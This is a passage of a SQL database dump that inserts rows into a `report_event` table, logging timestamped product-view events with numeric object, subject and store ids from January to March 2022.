(930, '2022-01-19 14:46:35', 1, 2064, 0, 1, 1),
(931, '2022-01-19 15:11:11', 1, 2055, 0, 1, 1),
(932, '2022-01-19 16:42:32', 1, 2061, 0, 1, 1),
(933, '2022-01-19 17:24:56', 1, 2058, 0, 1, 1),
(934, '2022-01-19 18:09:10', 1, 2059, 0, 1, 1),
(935, '2022-01-19 18:20:33', 1, 2061, 0, 1, 1),
(936, '2022-01-20 01:20:50', 1, 2055, 0, 1, 1),
(937, '2022-01-20 02:35:44', 1, 2055, 0, 1, 1),
(938, '2022-01-20 11:50:12', 1, 2058, 0, 1, 1),
(939, '2022-01-20 16:02:51', 1, 2061, 0, 1, 1),
(940, '2022-01-21 01:05:56', 1, 2061, 0, 1, 1),
(941, '2022-01-21 09:30:03', 1, 2062, 0, 1, 1),
(942, '2022-01-22 06:20:41', 1, 2061, 0, 1, 1),
(943, '2022-01-22 17:24:21', 1, 2055, 0, 1, 1),
(944, '2022-01-22 17:51:07', 1, 2064, 0, 1, 1),
(945, '2022-01-23 16:05:29', 1, 2064, 0, 1, 1),
(946, '2022-01-23 18:08:49', 1, 2054, 0, 1, 1),
(947, '2022-01-24 00:00:32', 1, 2055, 0, 1, 1),
(948, '2022-01-24 07:08:06', 1, 2064, 0, 1, 1),
(949, '2022-01-24 07:08:33', 1, 2061, 0, 1, 1),
(950, '2022-01-24 07:08:44', 1, 2058, 0, 1, 1),
(951, '2022-01-24 07:08:48', 1, 2055, 0, 1, 1),
(952, '2022-01-24 07:09:01', 1, 2059, 0, 1, 1),
(953, '2022-01-24 07:09:03', 1, 2054, 0, 1, 1),
(954, '2022-01-24 07:09:13', 1, 2062, 0, 1, 1),
(955, '2022-01-24 07:09:25', 1, 2063, 0, 1, 1),
(956, '2022-01-24 07:09:51', 1, 2060, 0, 1, 1),
(957, '2022-01-24 15:29:03', 1, 2062, 0, 1, 1),
(958, '2022-01-24 21:11:28', 1, 2055, 0, 1, 1),
(959, '2022-01-25 04:46:03', 1, 2058, 0, 1, 1),
(960, '2022-01-25 07:11:17', 1, 2063, 0, 1, 1),
(961, '2022-01-25 07:22:47', 1, 2055, 0, 1, 1),
(962, '2022-01-25 11:08:40', 1, 2062, 0, 1, 1),
(963, '2022-01-25 15:01:26', 1, 2063, 0, 1, 1),
(964, '2022-01-25 21:10:28', 1, 2060, 0, 1, 1),
(965, '2022-01-26 02:45:38', 1, 2062, 0, 1, 1),
(966, '2022-01-26 04:30:43', 1, 2062, 0, 1, 1),
(967, '2022-01-26 09:51:43', 1, 2064, 0, 1, 1),
(968, '2022-01-26 21:05:42', 1, 2063, 0, 1, 1),
(969, '2022-01-26 21:05:44', 1, 2062, 0, 1, 1),
(970, '2022-01-26 21:05:45', 1, 2064, 0, 1, 1),
(971, '2022-01-26 21:05:46', 1, 2061, 0, 1, 1),
(972, '2022-01-26 21:05:48', 1, 2060, 0, 1, 1),
(973, '2022-01-26 21:05:50', 1, 2059, 0, 1, 1),
(974, '2022-01-26 21:05:53', 1, 2058, 0, 1, 1),
(975, '2022-01-27 16:51:54', 1, 2055, 0, 1, 1),
(976, '2022-01-27 18:18:07', 1, 2055, 0, 1, 1),
(977, '2022-01-27 20:53:20', 1, 2062, 0, 1, 1),
(978, '2022-01-28 04:39:53', 1, 2058, 0, 1, 1),
(979, '2022-01-28 04:49:51', 1, 2058, 0, 1, 1),
(980, '2022-01-28 05:13:52', 1, 2059, 0, 1, 1),
(981, '2022-01-28 09:18:39', 1, 2054, 0, 1, 1),
(982, '2022-01-28 10:59:12', 1, 2061, 0, 1, 1),
(983, '2022-01-28 12:11:50', 1, 2062, 0, 1, 1),
(984, '2022-01-28 13:31:29', 1, 2063, 0, 1, 1),
(985, '2022-01-28 17:34:07', 1, 2061, 0, 1, 1),
(986, '2022-01-28 20:28:35', 1, 2061, 0, 1, 1),
(987, '2022-01-28 23:12:41', 1, 2064, 0, 1, 1),
(988, '2022-01-29 00:12:05', 1, 2059, 0, 1, 1),
(989, '2022-01-29 00:49:23', 1, 2058, 0, 1, 1),
(990, '2022-01-29 11:39:30', 1, 2062, 0, 1, 1),
(991, '2022-01-30 10:38:00', 1, 2058, 0, 1, 1),
(992, '2022-01-30 10:38:03', 1, 2061, 0, 1, 1),
(993, '2022-01-30 10:38:05', 1, 2062, 0, 1, 1),
(994, '2022-01-30 10:38:06', 1, 2060, 0, 1, 1),
(995, '2022-01-30 10:38:07', 1, 2063, 0, 1, 1),
(996, '2022-01-30 10:38:09', 1, 2059, 0, 1, 1),
(997, '2022-01-30 10:38:10', 1, 2064, 0, 1, 1),
(998, '2022-01-30 10:38:12', 1, 2055, 0, 1, 1),
(999, '2022-01-30 15:01:23', 1, 2064, 0, 1, 1),
(1000, '2022-01-30 22:03:11', 1, 2055, 0, 1, 1),
(1001, '2022-01-31 01:01:25', 1, 2064, 0, 1, 1),
(1002, '2022-01-31 06:01:23', 1, 2061, 0, 1, 1),
(1003, '2022-01-31 09:29:46', 1, 2054, 0, 1, 1),
(1004, '2022-01-31 09:29:53', 1, 2055, 0, 1, 1),
(1005, '2022-01-31 09:30:13', 1, 2064, 0, 1, 1),
(1006, '2022-01-31 09:30:17', 1, 2063, 0, 1, 1),
(1007, '2022-01-31 09:30:22', 1, 2062, 0, 1, 1),
(1008, '2022-01-31 09:30:30', 1, 2060, 0, 1, 1),
(1009, '2022-01-31 09:30:37', 1, 2059, 0, 1, 1),
(1010, '2022-01-31 09:30:45', 1, 2061, 0, 1, 1),
(1011, '2022-01-31 09:30:53', 1, 2058, 0, 1, 1),
(1012, '2022-01-31 12:05:11', 1, 2055, 0, 1, 1),
(1013, '2022-01-31 12:59:26', 1, 2053, 0, 1, 1),
(1014, '2022-01-31 18:10:01', 1, 2055, 0, 1, 1),
(1015, '2022-01-31 18:40:00', 1, 2064, 0, 1, 1),
(1016, '2022-01-31 20:41:44', 1, 2059, 0, 1, 1),
(1017, '2022-01-31 21:39:02', 1, 2054, 0, 1, 1),
(1018, '2022-02-01 02:31:07', 1, 2062, 0, 1, 1),
(1019, '2022-02-01 05:20:07', 1, 2055, 0, 1, 1),
(1020, '2022-02-01 17:49:41', 1, 2062, 0, 1, 1),
(1021, '2022-02-02 02:41:15', 1, 2064, 0, 1, 1),
(1022, '2022-02-02 03:49:39', 1, 2064, 0, 1, 1),
(1023, '2022-02-02 03:50:05', 1, 2062, 0, 1, 1),
(1024, '2022-02-02 03:50:22', 1, 2063, 0, 1, 1),
(1025, '2022-02-02 03:50:24', 1, 2061, 0, 1, 1),
(1026, '2022-02-02 03:50:27', 1, 2059, 0, 1, 1),
(1027, '2022-02-02 03:50:30', 1, 2058, 0, 1, 1),
(1028, '2022-02-02 03:50:33', 1, 2055, 0, 1, 1),
(1029, '2022-02-02 03:50:35', 1, 2054, 0, 1, 1),
(1030, '2022-02-02 03:50:39', 1, 2060, 0, 1, 1),
(1031, '2022-02-02 04:15:43', 1, 2064, 0, 1, 1),
(1032, '2022-02-02 11:53:56', 1, 2064, 0, 1, 1),
(1033, '2022-02-02 19:13:51', 1, 2064, 0, 1, 1),
(1034, '2022-02-02 23:11:12', 1, 2060, 0, 1, 1),
(1035, '2022-02-02 23:12:11', 1, 2060, 0, 1, 1),
(1036, '2022-02-04 01:49:38', 1, 2058, 0, 1, 1),
(1037, '2022-02-04 01:49:43', 1, 2061, 0, 1, 1),
(1038, '2022-02-04 01:49:44', 1, 2062, 0, 1, 1),
(1039, '2022-02-04 01:49:45', 1, 2060, 0, 1, 1),
(1040, '2022-02-04 01:49:46', 1, 2063, 0, 1, 1),
(1041, '2022-02-04 01:49:48', 1, 2059, 0, 1, 1),
(1042, '2022-02-04 01:49:49', 1, 2064, 0, 1, 1),
(1043, '2022-02-04 01:49:51', 1, 2055, 0, 1, 1),
(1044, '2022-02-04 14:55:00', 1, 2061, 0, 1, 1),
(1045, '2022-02-04 21:50:31', 1, 2063, 0, 1, 1),
(1046, '2022-02-05 00:41:16', 1, 2055, 0, 1, 1),
(1047, '2022-02-05 11:34:32', 1, 2058, 0, 1, 1),
(1048, '2022-02-05 11:34:36', 1, 2060, 0, 1, 1),
(1049, '2022-02-05 11:34:40', 1, 2064, 0, 1, 1),
(1050, '2022-02-05 11:34:44', 1, 2062, 0, 1, 1),
(1051, '2022-02-05 19:39:13', 1, 2058, 0, 1, 1),
(1052, '2022-02-06 08:02:47', 1, 2064, 0, 1, 1),
(1053, '2022-02-06 13:30:06', 1, 2061, 0, 1, 1),
(1054, '2022-02-06 18:30:02', 1, 2061, 0, 1, 1),
(1055, '2022-02-06 21:07:10', 1, 2064, 0, 1, 1),
(1056, '2022-02-07 17:17:09', 1, 2064, 0, 1, 1),
(1057, '2022-02-07 20:43:51', 1, 2061, 0, 1, 1),
(1058, '2022-02-07 22:06:53', 1, 2054, 0, 1, 1),
(1059, '2022-02-07 23:41:03', 1, 2055, 0, 1, 1),
(1060, '2022-02-08 00:10:56', 1, 2060, 0, 1, 1),
(1061, '2022-02-08 18:24:45', 1, 2058, 0, 1, 1),
(1062, '2022-02-08 20:16:56', 1, 2060, 0, 1, 1),
(1063, '2022-02-08 22:20:50', 1, 2054, 0, 1, 1),
(1064, '2022-02-09 06:32:55', 1, 2055, 0, 1, 1),
(1065, '2022-02-09 09:05:55', 1, 2059, 0, 1, 1),
(1066, '2022-02-09 10:39:53', 1, 2059, 0, 1, 1),
(1067, '2022-02-09 11:08:36', 1, 2061, 0, 1, 1),
(1068, '2022-02-09 19:39:10', 1, 2055, 0, 1, 1),
(1069, '2022-02-09 23:20:21', 1, 2061, 0, 1, 1),
(1070, '2022-02-10 05:08:38', 1, 2061, 0, 1, 1),
(1071, '2022-02-10 07:07:46', 1, 2058, 0, 1, 1),
(1072, '2022-02-10 07:08:00', 1, 2064, 0, 1, 1),
(1073, '2022-02-10 07:08:09', 1, 2054, 0, 1, 1),
(1074, '2022-02-10 07:08:19', 1, 2062, 0, 1, 1),
(1075, '2022-02-10 07:08:22', 1, 2055, 0, 1, 1),
(1076, '2022-02-10 07:08:27', 1, 2060, 0, 1, 1),
(1077, '2022-02-10 07:08:34', 1, 2059, 0, 1, 1),
(1078, '2022-02-10 07:08:36', 1, 2063, 0, 1, 1),
(1079, '2022-02-10 07:08:40', 1, 2061, 0, 1, 1),
(1080, '2022-02-10 07:11:12', 1, 2058, 0, 1, 1),
(1081, '2022-02-10 07:11:22', 1, 2064, 0, 1, 1),
(1082, '2022-02-10 07:11:34', 1, 2062, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(1083, '2022-02-10 07:11:38', 1, 2054, 0, 1, 1),
(1084, '2022-02-10 07:11:42', 1, 2055, 0, 1, 1),
(1085, '2022-02-10 07:11:52', 1, 2059, 0, 1, 1),
(1086, '2022-02-10 07:11:54', 1, 2063, 0, 1, 1),
(1087, '2022-02-10 07:11:59', 1, 2060, 0, 1, 1),
(1088, '2022-02-10 07:12:01', 1, 2061, 0, 1, 1),
(1089, '2022-02-10 07:12:14', 1, 2053, 0, 1, 1),
(1090, '2022-02-10 07:29:41', 1, 2064, 0, 1, 1),
(1091, '2022-02-10 07:30:00', 1, 2061, 0, 1, 1),
(1092, '2022-02-10 07:30:05', 1, 2058, 0, 1, 1),
(1093, '2022-02-10 07:30:07', 1, 2055, 0, 1, 1),
(1094, '2022-02-10 07:30:19', 1, 2059, 0, 1, 1),
(1095, '2022-02-10 07:30:22', 1, 2054, 0, 1, 1),
(1096, '2022-02-10 07:30:34', 1, 2062, 0, 1, 1),
(1097, '2022-02-10 07:30:42', 1, 2063, 0, 1, 1),
(1098, '2022-02-10 07:30:59', 1, 2060, 0, 1, 1),
(1099, '2022-02-10 22:15:13', 1, 2054, 0, 1, 1),
(1100, '2022-02-10 22:20:31', 1, 2061, 0, 1, 1),
(1101, '2022-02-11 03:36:14', 1, 2061, 0, 1, 1),
(1102, '2022-02-11 14:52:19', 1, 2062, 0, 1, 1),
(1103, '2022-02-11 20:03:08', 1, 2060, 0, 1, 1),
(1104, '2022-02-12 12:06:37', 1, 2059, 0, 1, 1),
(1105, '2022-02-12 12:51:36', 1, 2061, 0, 1, 1),
(1106, '2022-02-13 04:09:56', 1, 2063, 0, 1, 1),
(1107, '2022-02-13 07:07:37', 1, 2061, 0, 1, 1),
(1108, '2022-02-13 17:31:22', 1, 2063, 0, 1, 1),
(1109, '2022-02-15 02:39:41', 1, 2064, 0, 1, 1),
(1110, '2022-02-15 02:40:08', 1, 2061, 0, 1, 1),
(1111, '2022-02-15 02:40:17', 1, 2058, 0, 1, 1),
(1112, '2022-02-15 02:40:20', 1, 2055, 0, 1, 1),
(1113, '2022-02-15 02:40:31', 1, 2059, 0, 1, 1),
(1114, '2022-02-15 02:40:34', 1, 2054, 0, 1, 1),
(1115, '2022-02-15 02:40:43', 1, 2062, 0, 1, 1),
(1116, '2022-02-15 02:41:07', 1, 2063, 0, 1, 1),
(1117, '2022-02-15 02:41:30', 1, 2060, 0, 1, 1),
(1118, '2022-02-15 03:26:25', 1, 2061, 0, 1, 1),
(1119, '2022-02-15 03:44:43', 1, 2054, 0, 1, 1),
(1120, '2022-02-15 11:30:13', 1, 2063, 0, 1, 1),
(1121, '2022-02-15 11:30:35', 1, 2062, 0, 1, 1),
(1122, '2022-02-15 13:59:12', 1, 2054, 0, 1, 1),
(1123, '2022-02-15 17:54:45', 1, 2058, 0, 1, 1),
(1124, '2022-02-15 23:22:28', 1, 2055, 0, 1, 1),
(1125, '2022-02-16 02:45:41', 1, 2064, 0, 1, 1),
(1126, '2022-02-16 11:35:10', 1, 2055, 0, 1, 1),
(1127, '2022-02-16 11:35:13', 1, 2064, 0, 1, 1),
(1128, '2022-02-16 11:35:16', 1, 2061, 0, 1, 1),
(1129, '2022-02-16 11:35:20', 1, 2058, 0, 1, 1),
(1130, '2022-02-16 12:49:19', 1, 2058, 0, 1, 1),
(1131, '2022-02-16 15:01:51', 1, 2055, 0, 1, 1),
(1132, '2022-02-16 18:40:23', 1, 2060, 0, 1, 1),
(1133, '2022-02-16 18:43:32', 1, 2053, 0, 1, 1),
(1134, '2022-02-16 18:43:36', 1, 2054, 0, 1, 1),
(1135, '2022-02-16 18:43:40', 1, 2055, 0, 1, 1),
(1136, '2022-02-16 18:43:55', 1, 2064, 0, 1, 1),
(1137, '2022-02-16 18:44:03', 1, 2063, 0, 1, 1),
(1138, '2022-02-16 18:44:08', 1, 2062, 0, 1, 1),
(1139, '2022-02-16 18:44:12', 1, 2060, 0, 1, 1),
(1140, '2022-02-16 18:44:18', 1, 2059, 0, 1, 1),
(1141, '2022-02-16 18:44:22', 1, 2061, 0, 1, 1),
(1142, '2022-02-16 18:44:25', 1, 2058, 0, 1, 1),
(1143, '2022-02-16 19:48:23', 1, 2059, 0, 1, 1),
(1144, '2022-02-16 21:51:26', 1, 2061, 0, 1, 1),
(1145, '2022-02-17 02:32:40', 1, 2064, 0, 1, 1),
(1146, '2022-02-17 04:40:34', 1, 2059, 0, 1, 1),
(1147, '2022-02-17 05:48:23', 1, 2058, 0, 1, 1),
(1148, '2022-02-17 05:48:24', 1, 2061, 0, 1, 1),
(1149, '2022-02-17 05:48:26', 1, 2062, 0, 1, 1),
(1150, '2022-02-17 05:48:27', 1, 2060, 0, 1, 1),
(1151, '2022-02-17 05:48:29', 1, 2063, 0, 1, 1),
(1152, '2022-02-17 05:48:30', 1, 2059, 0, 1, 1),
(1153, '2022-02-17 05:48:32', 1, 2064, 0, 1, 1),
(1154, '2022-02-17 05:48:33', 1, 2055, 0, 1, 1),
(1155, '2022-02-18 00:16:29', 1, 2054, 0, 1, 1),
(1156, '2022-02-18 01:11:59', 1, 2060, 0, 1, 1),
(1157, '2022-02-18 08:03:46', 1, 2062, 0, 1, 1),
(1158, '2022-02-18 15:41:17', 1, 2053, 0, 1, 1),
(1159, '2022-02-18 16:10:28', 1, 2064, 0, 1, 1),
(1160, '2022-02-18 18:26:31', 1, 2060, 0, 1, 1),
(1161, '2022-02-19 00:18:28', 1, 2063, 0, 1, 1),
(1162, '2022-02-19 08:38:25', 1, 2064, 0, 1, 1),
(1163, '2022-02-19 18:24:47', 1, 2064, 0, 1, 1),
(1164, '2022-02-20 08:44:43', 1, 2064, 0, 1, 1),
(1165, '2022-02-20 08:45:09', 1, 2062, 0, 1, 1),
(1166, '2022-02-20 08:45:18', 1, 2063, 0, 1, 1),
(1167, '2022-02-20 08:45:20', 1, 2061, 0, 1, 1),
(1168, '2022-02-20 08:45:22', 1, 2059, 0, 1, 1),
(1169, '2022-02-20 08:45:25', 1, 2058, 0, 1, 1),
(1170, '2022-02-20 08:45:27', 1, 2055, 0, 1, 1),
(1171, '2022-02-20 08:45:30', 1, 2054, 0, 1, 1),
(1172, '2022-02-20 08:45:35', 1, 2060, 0, 1, 1),
(1173, '2022-02-20 19:38:26', 1, 2064, 0, 1, 1),
(1174, '2022-02-21 01:30:17', 1, 2058, 0, 1, 1),
(1175, '2022-02-21 12:41:45', 1, 2055, 0, 1, 1),
(1176, '2022-02-21 15:39:35', 1, 2059, 0, 1, 1),
(1177, '2022-02-21 17:43:57', 1, 2063, 0, 1, 1),
(1178, '2022-02-22 05:21:16', 1, 2059, 0, 1, 1),
(1179, '2022-02-22 07:27:33', 1, 2064, 0, 1, 1),
(1180, '2022-02-22 20:19:05', 1, 2053, 0, 1, 1),
(1181, '2022-02-22 23:06:43', 1, 2055, 0, 1, 1),
(1182, '2022-02-23 02:55:13', 1, 2064, 0, 1, 1),
(1183, '2022-02-23 04:15:48', 1, 2054, 0, 1, 1),
(1184, '2022-02-23 05:49:09', 1, 2064, 0, 1, 1),
(1185, '2022-02-23 05:49:28', 1, 2062, 0, 1, 1),
(1186, '2022-02-23 05:49:40', 1, 2063, 0, 1, 1),
(1187, '2022-02-23 05:49:47', 1, 2061, 0, 1, 1),
(1188, '2022-02-23 05:49:49', 1, 2059, 0, 1, 1),
(1189, '2022-02-23 05:49:51', 1, 2058, 0, 1, 1),
(1190, '2022-02-23 05:49:53', 1, 2055, 0, 1, 1),
(1191, '2022-02-23 05:49:55', 1, 2054, 0, 1, 1),
(1192, '2022-02-23 05:50:04', 1, 2060, 0, 1, 1),
(1193, '2022-02-23 06:56:07', 1, 2054, 0, 1, 1),
(1194, '2022-02-23 12:21:57', 1, 2054, 0, 1, 1),
(1195, '2022-02-23 21:09:58', 1, 2064, 254, 1, 1),
(1196, '2022-02-23 21:10:08', 1, 2064, 254, 1, 1),
(1197, '2022-02-23 21:10:14', 1, 2064, 254, 1, 1),
(1198, '2022-02-23 21:10:22', 1, 2064, 254, 1, 1),
(1199, '2022-02-23 23:00:32', 1, 2054, 0, 1, 1),
(1200, '2022-02-24 02:56:46', 1, 2061, 0, 1, 1),
(1201, '2022-02-24 13:52:00', 1, 2062, 0, 1, 1),
(1202, '2022-02-24 15:43:53', 1, 2060, 0, 1, 1),
(1203, '2022-02-24 23:21:12', 1, 2064, 256, 1, 1),
(1204, '2022-02-24 23:22:39', 1, 2064, 256, 1, 1),
(1205, '2022-02-24 23:27:27', 1, 2064, 256, 1, 1),
(1206, '2022-02-24 23:29:20', 1, 2064, 256, 1, 1),
(1207, '2022-02-25 00:00:59', 1, 2063, 0, 1, 1),
(1208, '2022-02-25 02:31:25', 1, 2064, 0, 1, 1),
(1209, '2022-02-25 05:37:11', 1, 2064, 0, 1, 1),
(1210, '2022-02-25 07:31:26', 1, 2064, 0, 1, 1),
(1211, '2022-02-25 15:34:35', 1, 2055, 0, 1, 1),
(1212, '2022-02-25 18:24:09', 1, 2060, 0, 1, 1),
(1213, '2022-02-25 19:57:24', 1, 2053, 0, 1, 1),
(1214, '2022-02-26 07:58:25', 1, 2064, 0, 1, 1),
(1215, '2022-02-26 09:04:07', 1, 2054, 0, 1, 1),
(1216, '2022-02-26 09:04:19', 1, 2055, 0, 1, 1),
(1217, '2022-02-26 09:05:11', 1, 2064, 0, 1, 1),
(1218, '2022-02-26 09:05:21', 1, 2063, 0, 1, 1),
(1219, '2022-02-26 09:05:34', 1, 2062, 0, 1, 1),
(1220, '2022-02-26 09:05:52', 1, 2060, 0, 1, 1),
(1221, '2022-02-26 09:06:22', 1, 2059, 0, 1, 1),
(1222, '2022-02-26 09:06:32', 1, 2061, 0, 1, 1),
(1223, '2022-02-26 09:06:48', 1, 2058, 0, 1, 1),
(1224, '2022-02-26 12:31:03', 1, 2053, 0, 1, 1),
(1225, '2022-02-26 16:35:31', 1, 2058, 0, 1, 1),
(1226, '2022-02-26 18:49:25', 1, 2055, 0, 1, 1),
(1227, '2022-02-26 19:15:25', 1, 2060, 0, 1, 1),
(1228, '2022-02-26 21:56:16', 1, 2061, 0, 1, 1),
(1229, '2022-02-27 04:24:57', 1, 2059, 0, 1, 1),
(1230, '2022-02-27 13:08:44', 1, 2055, 0, 1, 1),
(1231, '2022-02-27 18:49:27', 1, 2055, 0, 1, 1),
(1232, '2022-02-27 20:05:00', 1, 2064, 0, 1, 1),
(1233, '2022-02-27 22:01:39', 1, 2060, 0, 1, 1),
(1234, '2022-02-28 02:39:25', 1, 2064, 0, 1, 1),
(1235, '2022-02-28 04:01:16', 1, 2058, 0, 1, 1),
(1236, '2022-02-28 04:01:18', 1, 2061, 0, 1, 1),
(1237, '2022-02-28 04:01:19', 1, 2062, 0, 1, 1),
(1238, '2022-02-28 04:01:20', 1, 2060, 0, 1, 1),
(1239, '2022-02-28 04:01:22', 1, 2063, 0, 1, 1),
(1240, '2022-02-28 04:01:24', 1, 2059, 0, 1, 1),
(1241, '2022-02-28 04:01:25', 1, 2064, 0, 1, 1),
(1242, '2022-02-28 04:01:26', 1, 2055, 0, 1, 1),
(1243, '2022-02-28 05:21:00', 1, 2059, 0, 1, 1),
(1244, '2022-02-28 05:35:10', 1, 2061, 0, 1, 1),
(1245, '2022-02-28 08:19:48', 1, 2064, 0, 1, 1),
(1246, '2022-02-28 08:20:06', 1, 2062, 0, 1, 1),
(1247, '2022-02-28 08:20:21', 1, 2063, 0, 1, 1),
(1248, '2022-02-28 08:20:23', 1, 2061, 0, 1, 1),
(1249, '2022-02-28 08:20:26', 1, 2059, 0, 1, 1),
(1250, '2022-02-28 08:20:28', 1, 2058, 0, 1, 1),
(1251, '2022-02-28 08:20:31', 1, 2055, 0, 1, 1),
(1252, '2022-02-28 08:20:34', 1, 2054, 0, 1, 1),
(1253, '2022-02-28 08:20:37', 1, 2060, 0, 1, 1),
(1254, '2022-02-28 15:41:44', 1, 2055, 0, 1, 1),
(1255, '2022-02-28 20:45:41', 1, 2064, 0, 1, 1),
(1256, '2022-03-01 05:56:41', 1, 2061, 0, 1, 1),
(1257, '2022-03-01 13:55:10', 1, 2059, 0, 1, 1),
(1258, '2022-03-01 14:28:09', 1, 2054, 0, 1, 1),
(1259, '2022-03-02 09:00:04', 1, 2062, 0, 1, 1),
(1260, '2022-03-02 13:03:32', 1, 2063, 0, 1, 1),
(1261, '2022-03-02 13:03:34', 1, 2062, 0, 1, 1),
(1262, '2022-03-02 13:03:35', 1, 2064, 0, 1, 1),
(1263, '2022-03-02 13:03:36', 1, 2061, 0, 1, 1),
(1264, '2022-03-02 13:03:38', 1, 2060, 0, 1, 1),
(1265, '2022-03-02 13:03:41', 1, 2059, 0, 1, 1),
(1266, '2022-03-02 13:03:45', 1, 2058, 0, 1, 1),
(1267, '2022-03-02 13:47:57', 4, 2058, 263, 1, 1),
(1268, '2022-03-02 16:27:05', 1, 2063, 0, 1, 1),
(1269, '2022-03-02 18:24:10', 1, 2061, 0, 1, 1),
(1270, '2022-03-03 02:46:22', 1, 2064, 0, 1, 1),
(1271, '2022-03-03 04:41:25', 1, 2055, 0, 1, 1),
(1272, '2022-03-03 21:40:31', 1, 2064, 0, 1, 1),
(1273, '2022-03-03 22:36:07', 1, 2054, 0, 1, 1),
(1274, '2022-03-04 02:07:30', 1, 2054, 0, 1, 1),
(1275, '2022-03-04 02:42:59', 1, 2064, 0, 1, 1),
(1276, '2022-03-04 02:43:29', 1, 2062, 0, 1, 1),
(1277, '2022-03-04 02:43:39', 1, 2063, 0, 1, 1),
(1278, '2022-03-04 02:43:41', 1, 2061, 0, 1, 1),
(1279, '2022-03-04 02:43:43', 1, 2059, 0, 1, 1),
(1280, '2022-03-04 02:43:45', 1, 2058, 0, 1, 1),
(1281, '2022-03-04 02:43:48', 1, 2055, 0, 1, 1),
(1282, '2022-03-04 02:43:50', 1, 2054, 0, 1, 1),
(1283, '2022-03-04 02:43:59', 1, 2060, 0, 1, 1),
(1284, '2022-03-04 04:11:12', 1, 2061, 0, 1, 1),
(1285, '2022-03-04 04:17:04', 1, 2055, 0, 1, 1),
(1286, '2022-03-04 15:03:34', 1, 2064, 0, 1, 1),
(1287, '2022-03-04 19:59:02', 1, 2058, 0, 1, 1),
(1288, '2022-03-04 19:59:04', 1, 2061, 0, 1, 1),
(1289, '2022-03-04 19:59:05', 1, 2062, 0, 1, 1),
(1290, '2022-03-04 19:59:06', 1, 2060, 0, 1, 1),
(1291, '2022-03-04 19:59:08', 1, 2063, 0, 1, 1),
(1292, '2022-03-04 19:59:09', 1, 2059, 0, 1, 1),
(1293, '2022-03-04 19:59:10', 1, 2064, 0, 1, 1),
(1294, '2022-03-04 19:59:11', 1, 2055, 0, 1, 1),
(1295, '2022-03-05 01:08:48', 1, 2060, 0, 1, 1),
(1296, '2022-03-05 13:36:06', 1, 2064, 0, 1, 1),
(1297, '2022-03-06 13:02:33', 1, 2054, 0, 1, 1),
(1298, '2022-03-06 13:02:40', 1, 2055, 0, 1, 1),
(1299, '2022-03-06 13:03:15', 1, 2064, 0, 1, 1),
(1300, '2022-03-06 13:03:21', 1, 2063, 0, 1, 1),
(1301, '2022-03-06 13:03:31', 1, 2062, 0, 1, 1),
(1302, '2022-03-06 13:03:39', 1, 2060, 0, 1, 1),
(1303, '2022-03-06 13:03:44', 1, 2059, 0, 1, 1),
(1304, '2022-03-06 13:03:52', 1, 2061, 0, 1, 1),
(1305, '2022-03-06 13:03:55', 1, 2058, 0, 1, 1),
(1306, '2022-03-06 16:18:26', 1, 2053, 0, 1, 1),
(1307, '2022-03-06 19:43:28', 1, 2060, 0, 1, 1),
(1308, '2022-03-06 20:43:19', 1, 2064, 0, 1, 1),
(1309, '2022-03-06 21:45:41', 1, 2061, 0, 1, 1),
(1310, '2022-03-06 21:51:06', 1, 2064, 268, 1, 1),
(1311, '2022-03-06 21:52:09', 1, 2064, 268, 1, 1),
(1312, '2022-03-06 21:52:52', 1, 2064, 268, 1, 1),
(1313, '2022-03-06 21:53:35', 1, 2064, 268, 1, 1),
(1314, '2022-03-07 02:14:06', 1, 2059, 0, 1, 1),
(1315, '2022-03-08 09:46:11', 1, 2059, 0, 1, 1),
(1316, '2022-03-08 15:01:53', 1, 2061, 0, 1, 1),
(1317, '2022-03-08 15:39:50', 1, 2054, 0, 1, 1),
(1318, '2022-03-08 16:31:51', 1, 2054, 0, 1, 1),
(1319, '2022-03-08 21:00:48', 1, 2064, 0, 1, 1),
(1320, '2022-03-09 00:34:18', 1, 2060, 0, 1, 1),
(1321, '2022-03-09 00:35:19', 1, 2060, 0, 1, 1),
(1322, '2022-03-09 02:40:31', 1, 2064, 0, 1, 1),
(1323, '2022-03-09 10:21:04', 1, 2064, 0, 1, 1),
(1324, '2022-03-09 20:46:51', 1, 2062, 0, 1, 1),
(1325, '2022-03-09 20:47:12', 1, 2063, 0, 1, 1),
(1326, '2022-03-09 20:47:19', 1, 2061, 0, 1, 1),
(1327, '2022-03-09 20:47:25', 1, 2059, 0, 1, 1),
(1328, '2022-03-09 20:47:31', 1, 2058, 0, 1, 1),
(1329, '2022-03-09 20:47:38', 1, 2055, 0, 1, 1),
(1330, '2022-03-09 20:47:44', 1, 2054, 0, 1, 1),
(1331, '2022-03-09 20:47:57', 1, 2060, 0, 1, 1),
(1332, '2022-03-09 20:51:38', 1, 2053, 0, 1, 1),
(1333, '2022-03-10 01:51:17', 1, 2062, 0, 1, 1),
(1334, '2022-03-12 04:27:45', 1, 2055, 0, 1, 1),
(1335, '2022-03-12 04:33:36', 1, 2054, 0, 1, 1),
(1336, '2022-03-12 06:05:41', 1, 2055, 0, 1, 1),
(1337, '2022-03-12 06:43:03', 1, 2059, 0, 1, 1),
(1338, '2022-03-12 06:58:02', 1, 2059, 0, 1, 1),
(1339, '2022-03-12 11:14:16', 1, 2062, 0, 1, 1),
(1340, '2022-03-13 03:59:32', 1, 2053, 0, 1, 1),
(1341, '2022-03-13 12:16:04', 1, 2061, 0, 1, 1),
(1342, '2022-03-14 01:23:05', 1, 2060, 0, 1, 1),
(1343, '2022-03-14 09:29:43', 1, 2061, 0, 1, 1),
(1344, '2022-03-14 21:54:42', 1, 2064, 0, 1, 1),
(1345, '2022-03-14 23:09:29', 1, 2058, 0, 1, 1),
(1346, '2022-03-15 11:41:59', 1, 2063, 0, 1, 1),
(1347, '2022-03-15 15:00:33', 1, 2061, 0, 1, 1),
(1348, '2022-03-15 17:14:02', 1, 2063, 0, 1, 1),
(1349, '2022-03-16 07:10:04', 1, 2064, 0, 1, 1),
(1350, '2022-03-16 08:08:51', 1, 2064, 0, 1, 1),
(1351, '2022-03-16 08:30:40', 1, 2054, 0, 1, 1),
(1352, '2022-03-16 08:30:45', 1, 2055, 0, 1, 1),
(1353, '2022-03-16 08:31:07', 1, 2064, 0, 1, 1),
(1354, '2022-03-16 08:31:10', 1, 2063, 0, 1, 1),
(1355, '2022-03-16 08:31:15', 1, 2062, 0, 1, 1),
(1356, '2022-03-16 08:31:22', 1, 2060, 0, 1, 1),
(1357, '2022-03-16 08:31:27', 1, 2059, 0, 1, 1),
